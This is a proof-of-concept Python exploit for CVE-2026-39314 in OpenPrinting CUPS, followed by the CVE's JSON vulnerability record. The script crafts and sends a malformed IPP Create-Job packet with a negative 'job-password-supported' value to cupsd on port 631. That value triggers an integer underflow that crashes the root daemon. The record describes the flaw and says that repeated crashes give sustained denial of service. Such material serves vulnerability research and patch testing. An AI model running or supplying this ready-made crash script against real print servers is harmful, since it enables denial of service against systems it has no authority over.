CVE-2026-39314

import socket # PoC for CVE-2026-39314 # Description: Triggers integer underflow in CUPS _ppdCreateFromIPP() # by sending a negative value for 'job-password-supported'. TARGET_HOST = "127.0.0.1" TARGET_PORT = 631 def create_malicious_ipp_packet(): # IPP Header (Simplified) # Version: 0x0201 (IPP 2.1) # Operation ID: 0x0005 (Create-Job) # Request ID: 1 version = b'\x02\x01' op_id = b'\x00\x05' req_id = b'\x00\x00\x00\x01' # Attribute Group: Operations Attributes (0x01) # We inject the malicious attribute here # Tag for Integer value: 0x21 # Attribute Name: job-password-supported # Value: -1 (0xFFFFFFFF) payload = version + op_id + req_id # Start Operations Attributes Group payload += b'\x01' # Malicious Attribute Construction attr_name = b'job-password-supported' payload += b'\x21' # Integer Tag payload += bytes([len(attr_name)]) + attr_name # Name payload += b'\x00\x04' # Value Length (4 bytes) payload += b'\xff\xff\xff\xff' # Value: -1 # End of Attributes Tag payload += b'\x03' # Wrap in HTTP (IPP runs over HTTP) http_data = ( f"POST / HTTP/1.1\r\n" f"Host: {TARGET_HOST}\r\n" f"Content-Type: application/ipp\r\n" f"Content-Length: {len(payload)}\r\n" f"\r\n" ).encode() return http_data + payload def send_exploit(): try: print(f"[*] Sending exploit to {TARGET_HOST}:{TARGET_PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_HOST, TARGET_PORT)) packet = create_malicious_ipp_packet() s.send(packet) s.close() print("[+] Exploit sent. Check if cupsd crashed.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-39314", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:37.073", "lastModified": "2026-04-16T18:13:32.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.16 and prior, an integer underflow vulnerability in _ppdCreateFromIPP() (cups/ppd-cache.c) allows any unprivileged local user to crash the cupsd root process by supplying a negative job-password-supported IPP attribute. The bounds check only caps the upper bound, so a negative value passes validation, is cast to size_t (wrapping to ~2^64), and is used as the length argument to memset() on a 33-byte stack buffer. This causes an immediate SIGSEGV in the cupsd root process. Combined with systemd's Restart=on-failure, an attacker can repeat the crash for sustained denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.4.16", "matchCriteriaId": "8A2A4507-B2D7-43B8-B008-6EC2F5053FA9"}]}]}], "references": [{"url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-pp8w-2g52-7vj7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}